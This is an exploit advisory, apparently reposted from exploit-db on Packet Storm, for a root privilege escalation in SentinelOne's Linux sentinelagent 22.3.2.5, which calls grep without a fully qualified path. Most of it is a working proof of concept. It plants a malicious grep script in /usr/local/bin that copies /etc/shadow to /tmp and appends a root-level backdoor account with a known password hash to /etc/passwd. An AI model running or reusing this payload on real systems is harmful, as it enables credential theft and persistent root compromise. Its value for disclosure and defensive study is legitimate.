Headline

SentinelOne sentinelagent 22.3.2.5 Privilege Escalation

SentinelOne sentinelagent version 22.3.2.5 on Linux suffers from a privilege escalation vulnerability due to not use a fully qualified path when calling grep.

2 years ago

Packet Storm

Open in Source

#vulnerability #mac #google #ubuntu #linux #auth #zero_day

Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability
Date: 12/06/2022
Exploit Author: ouch_this_hurts
Vendor Homepage: https://www.sentinelone.com/
Software Link: https://assets.sentinelone.com/prod/s1-linux-agent-datas
Version: 22.3.2.5
Tested on: Ubuntu 22.04.x
CVE: NA

Not enough AI in the world can help you write secure software it seems? The vendor doesnt make reporting vulnerabilities easy, so to exploit-db it goes :)

Protips:

If I Google you, and I cannot find an easy way to report the vulnerability, I’m not going to bother.
If you require me to use HackerOne, I’m not going to bother.
If you dont have a security.txt, how do you expect me to contact you?

Get root on a system with sentinelagent<=22.3.2.5 with one simple trick:

Override grep in the PATH with your malicious code. Reboot. pwnd. Nice!

PoC below:

Find the systems “earliest” PATH, or just override it to whatever you want in /etc/environment with some other staged exploit.

Create the following grep file in that directory and make sure its executable:

cat << SENTINELOOPS > /usr/local/bin/grep  
#!/bin/bash  
# I think I'll have the passwds pl0x  
cat /etc/shadow > /tmp/etc_shadow

# password is password :)  
echo 'sentinel_oops:\$1\$user1\$WuzQ29wbcMN09VLW7X0/q1:0:0::/root:/bin/sh' >> /etc/passwd  
SENTINELOOPS

chmod +x /usr/local/bin/grep